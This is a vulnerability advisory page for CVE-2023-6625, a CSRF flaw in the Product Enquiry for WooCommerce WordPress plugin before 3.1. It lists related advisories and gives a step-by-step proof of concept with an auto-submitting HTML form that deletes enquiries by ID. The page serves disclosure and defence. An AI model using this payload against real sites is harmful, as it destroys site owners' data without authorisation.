Product Enquiry for WooCommerce < 3.1 - Arbitrary Enquiry Deletion via CSRF
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2023-6625 | 22 Jan 202421:31 | – | circl | |
| WordPress plugin Product Enquiry for WooCommerce Security Vulnerability | 22 Jan 202400:00 | – | cnnvd | |
| CVE-2023-6625 | 22 Jan 202419:14 | – | cve | |
| CVE-2023-6625 Product Enquiry for WooCommerce < 3.1 - Arbitrary Enquiry Deletion via CSRF | 22 Jan 202419:14 | – | cvelist | |
| EUVD-2023-58848 | 3 Oct 202520:07 | – | euvd | |
| CVE-2023-6625 | 22 Jan 202420:15 | – | nvd | |
| CVE-2023-6625 | 22 Jan 202420:15 | – | osv | |
| Cross site request forgery (csrf) | 22 Jan 202420:15 | – | prion | |
| PT-2024-15028 · WordPress · Product Enquiry For Woocommerce | 22 Jan 202400:00 | – | ptsecurity | |
| CVE-2023-6625 | 23 May 202504:57 | – | redhatcve |
10
1. Make an enquiry from the frontend form
2. Go to "Woo Quote Popup > Enquiry List"
3. Get the ID of an item
4. Add the ID to the following HTML:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=GMWQP&view=list" method="POST">
<input type="text" name="action" value="delete">
<input type="text" name="action2" value="delete">
<input type="text" name="page" value="GMWQP">
<input type="text" name="_wp_http_referer" value="%2Fwp-admin%2Fadmin.php%3Fpage%3DGMWQP%26view%3Dlist">
<input type="text" name="id[]" value="__ADD_ID_HERE__">
<input type="submit" value="submit">
</form>
</body>
```
5. See that the item has been deleted.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Dec 2023 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 3.14.3
EPSS0.00203
SSVC